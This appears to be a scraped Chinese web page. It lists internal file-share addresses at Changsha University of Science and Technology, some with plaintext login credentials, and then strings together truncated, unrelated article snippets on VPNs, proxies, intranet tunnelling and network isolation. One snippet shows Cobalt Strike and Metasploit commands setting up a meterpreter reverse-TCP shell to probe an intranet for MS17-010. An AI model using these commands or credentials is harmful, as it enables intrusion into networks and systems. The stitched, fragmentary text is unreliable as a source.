长沙理工大学内网资源

vcd2 连续剧: \\10.64.3.16

电影,学习的: \\10.64.3.10

                     \\10.26.23.83  用户名st 密码:jgxyst

                    \\192.168.0.82 用户名st  无密码

金盆岭校区有   \\172.16.0.201  用户名st  无密码(云塘也可用)不过好像就几个好使
时间: 2024-10-12 20:05:04

长沙理工大学内网资源的相关文章

隔离二级内网用户访问一级内网资源不影响上网

设备需求,一级路由支持多网段,不做网段间的静态路由 二级路由wan设为第二网段IP,lan网段与以上不同 例:一级路由第一网段192.168.1.X/24,第二网段192.168.2.X/24,. 二级路由wan设为192.168.2.X/24,二级路由lan网段为192.168.3.X/24. 实现192.168.3.X/24用户正常上网,不能访问第一网段资源. 隔离二级内网用户访问一级内网资源不影响上网,布布扣,bubuko.com

部分3G网卡连接Cisco VPN后不能访问内网资源

部分3G网卡连接Cisco VPN后不能访问内网资源 现象:使用3G网卡连接网络后,访问互联网正常,连接Cisco IPSec VPN后,不能连接公司内网服务器. 使用环境:Windows7.cisco VPN.联通3G网卡 解决方法:修改3G网卡连接类型为modem 注:并非所有的3G卡都需要如上设置,因为版本和供应商不同默认的模式也不同.

怎样从外网访问内网服务器

假设内网有一个自己的电脑A(运行Win7),希望在家中用另一台电脑B(运行Win7)访问内网资源. 先决条件 1. A机上可访问外网并且可以安装虚拟机. 2. 拥有一个外网的VPS服务器S(运行Debian),可购买BandWagon的廉价服务器(http://bandwagonhost.com/),一年100多元. 原理 从A机发起到S的连接,并保持此连接.以此连接为基础,建立从S到A的隧道.再将S所有到80端口的请求(HTTP请求)通过隧道转发到A机上,由A机作为S机的HTTP代理.外网B机

Cisco路由器之Easy虚拟专用网(解决出差员工访问公司内网的问题)

博文大纲:一.在路由器上实现Easy 虚拟专用网需要配置什么?二.配置实例 前言:由于"Virtual Private Network"(请看首字母,就知道是什么咯)是敏\感词汇,所以在博文中使用它的中文名字"虚拟专用网"来代替. 在之前写过了Cisco路由器之IPSec 虚拟专用网:在Cisco的ASA防火墙上实现IPSec虚拟专用网.这两篇博文都是用于实现总公司和分公司之间建立虚拟专用网的,那么还有一种使用很多的情况,就是出差人员想要访问公司内网的资源呢?由于出

Cisco ASA防火墙之Easy虚拟专用网(解决出差员工访问公司内网的问题)

前言:上一篇博文写了Cisco路由器之Easy虚拟专用网(解决出差员工访问公司内网的问题),是基于公司网关设备是路由器的情况下,那么,如果是ASA防火墙的话,又该怎么配置呢?关于理论部分,在前面提到的博文链接中已经写的挺详细了,可以参考那篇博文的理论部分,这里就直接上配置了. 该博文关于虚拟专用网的理论知识点比较少,因为我之前写过好几篇虚拟专用网的博文了,所以关于原理方面不会重复写,若想了解原理,可以参考以下博文(路由器和防火墙的虚拟专用网原理类似,可参考): Cisco路由器之Easy虚拟专用

Cisco 路由器上配置Easy虚拟专用网(解决员工出差访问公司内网)

博文目录一.Easy 虚拟化专用网需要解决的问题是什么?二.如何在路由器上实现Easy 虚拟专用网?三.配置路由器上实现Easy 虚拟专用网 由于"Virtual Private Network"(请看首字母,就知道是什么咯)是敏\感词汇,所以在博文中使用它的中文名字"虚拟专用网"来代替. 在之前写过了Cisco路由器IPSec 虚拟专用网原理与详细配置:Cisco的ASA防火墙和路由器上实现IPSec虚拟专用网.这两篇博文都是用于实现总公司和分公司之间建立虚拟专用

cs配合msf批量探测内网MS17-010漏洞

第一步 Cobalt strike 派生 shell 给 MSF(前提有个beacon shell) 第二步 选择要派生的beacon,右键-->增加会话,选择刚刚配置的foreign监听器 第三部 msf msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_t

阿里云内网机器通过squids代理上访问外网资源

一.背景 代理服务器A(10.0.1.2)机器有公网地址可正常访问外网 业务服务器B(10.0.1.33)机器无公网地址不能访问外网 代理服务器A((10.0.1.2)和业务服务器B(10.0.1.33)在公一个数据中心(同一个局域网) 需要实现B访问外网通过A代理出去 二.安装 在代理服务器A(10.0.1.2)机器上安装squid yum install openssl squid -y 然后启动服务 service squid start 2.在业务服务器B(10.0.1.33)机器宿主目

vpn+squid搞定内网才能访问的svn

业精于勤荒于嬉,愿程序猿们鼓起干劲,坚持学下去! 目录 前言 一.squid安装和使用 二.本机的svn代理设置 前言 今天由于要修改公司项目的配置文件,于是不得不秒登vpn,登上svn跳板机,把要修改的文件update下来.修改完成后,在跳板机上传,最后再经过几道程序,终于更新到线上了. 对于不能在个人电脑上update公司svn的代码,着实有些不方便.当然公司是为了代码安全考虑,多加一点防范,我们是可以理解的. 于是,又开始琢磨怎么把svn的代码搞到本机.其实,这问题蛮简单的,只要对于网络知